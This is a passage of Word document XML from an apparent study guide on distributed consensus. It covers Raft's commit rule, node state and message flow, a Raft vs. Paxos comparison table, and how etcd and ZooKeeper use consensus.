        <w:t xml:space="preserve">  Term 3 leader overwrites index 3 with a different value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C36679D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  VIOLATION: committed entry was lost!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E31B10C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="03621059" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>With rule 2: A leader can only count an entry as committed if it has also</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419EAE4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  replicated an entry from its CURRENT term. This ensures the leader can</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51550E62" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  prove its authority extends to that log position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4715B279" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 Raft State Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266CA2E0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B139D4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Each node maintains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A043450" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="2E57A0AE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Persistent (survives crash, written to disk before responding):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BBEEDA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  currentTerm: latest term seen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC71184" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  votedFor: candidate voted for in current term (null if none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F7B338" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  log[]: log entries (each with term and command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA34303" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="544E917F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Volatile (rebuilt after restart):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653092F2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  commitIndex: highest log entry known to be committed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138237A4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  lastApplied: highest log entry applied to state machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059D4D5F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="7EADF13A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Leader-only volatile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720C355A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  nextIndex[]:  for each follower, next log entry to send</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5967C47D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  matchIndex[]: for each follower, highest log entry known to be replicated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE9E6EB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.8 Raft Summary Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344CBAB6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA39CF9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Normal Operation (steady state):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C9F9E3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="10845601" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Client          Leader (A)          Follower (B)        Follower (C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE4245A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │                 │                    │                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E536F2E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │─── cmd ───────&gt;│                    │                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD136C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │                 │── AppendEntries ──&gt;│                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293EFCAA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │                 │── AppendEntries ──────────────────────&gt;│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706FC4D8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │                 │                    │                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF906D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │                 │&lt;─── Success ──────│                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB4661D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │                 │&lt;─── Success ──────────────────────────│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBE2912" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │                 │                    │                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363A7CC5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │                 │ (majority: commit) │                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD15440" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │                 │ (apply to state machine)               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059A0E6B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │&lt;─── response ──│                    │                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0227D965" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │                 │                    │                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCBA5D9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │                 │── heartbeat (leaderCommit=N) ─────────&gt;│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A64B7B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  │                 │                    │ (apply to state machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAA6967" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="2A9A6558" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Latency: 1 round trip (leader → followers → ack → commit → respond)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002E9B0B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="1C56B5DD">
          <v:rect id="_x0000_i6243" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FE9FB5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Raft vs. Paxos — Comparison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879"/>
        <w:gridCol w:w="3019"/>
        <w:gridCol w:w="3452"/>
      </w:tblGrid>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="1160A2D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41AAC3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aspect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40D20A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Paxos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C69576" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049626E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Raft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="5BD9488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52E253" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Correctness proof</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C15F0B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Yes (rigorous)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68217B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Yes (TLA+ verified)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="1490A1D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BFF22E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Understandability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BA9CB7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Notoriously difficult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1ACF53" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Designed for clarity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="3BBEC5D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9E2E65" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Leader concept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669861" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Implicit (optimization)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F0AA36" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Explicit (core design)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="1A4701A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B7A17E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:lastRenderedPageBreak/>
              <w:t>Log replication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BB2BF3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Unspecified (Multi-Paxos)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91E691" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Clearly specified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="47F9457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160C66" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Reconfiguration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E68484" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Complex (separate protocol)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767F29" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Joint consensus or single-step</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="2E7CC83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EB1D48" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Implementation guidance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CF2355" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Minimal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8B34FE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Detailed (paper + reference impl)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="49A3C93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18EA6D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Production use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E61D48" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Google (Chubby, Spanner)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FE2A25" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>etcd, CockroachDB, TiDB, Consul</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0049626E" w:rsidRPr="0049626E" w14:paraId="1EDAF2A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6B6C3F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Performance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246CE0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Equivalent in practice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71ABDC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
            <w:r w:rsidRPr="0049626E">
              <w:t>Equivalent in practice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="509B1747" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="458BAEA2">
          <v:rect id="_x0000_i6244" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D8E43E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Practical Consensus Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B91C7A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 etcd (Raft)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F865B1F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70629631" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>etcd: Distributed key-value store using Raft consensus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1128BF27" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Used by: Kubernetes (cluster state), CoreDNS, many distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6339FDA1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="42C3E7C0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709E778E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - 3 or 5 node cluster (odd number for majority).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5D7561" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - All writes go through Raft leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6CC834" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Reads can go to leader (linearizable) or any node (serializable, possibly stale).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E49550B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Watch API: clients subscribe to key changes (real-time notifications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E508541" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="4214C4A3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C879A2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Write latency: 1-10ms (single Raft round trip within datacenter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EEFC36" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Read latency: &lt;1ms (leader), 1-5ms (serializable from any node)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554EA4F1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Throughput: 10,000-50,000 writes/sec (depends on value size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451A9F2C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29592ADC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Typical use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCE0586" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Kubernetes stores ALL cluster state in etcd (pods, services, configmaps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B6CA15" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Service discovery (register services, watch for changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7370C2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Distributed configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B96FE3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Leader election for application services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05060DCB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 ZooKeeper (ZAB — Zookeeper Atomic Broadcast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544BCC4F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE9C8F0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>ZAB: Similar to Raft but predates it. Uses a protocol called Zookeeper Atomic Broadcast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CEA202" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="132A2CA0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Key differences from Raft:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FEC061" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Recovery protocol is different (ZAB has a distinct "discovery" phase)</w:t>
      </w:r>
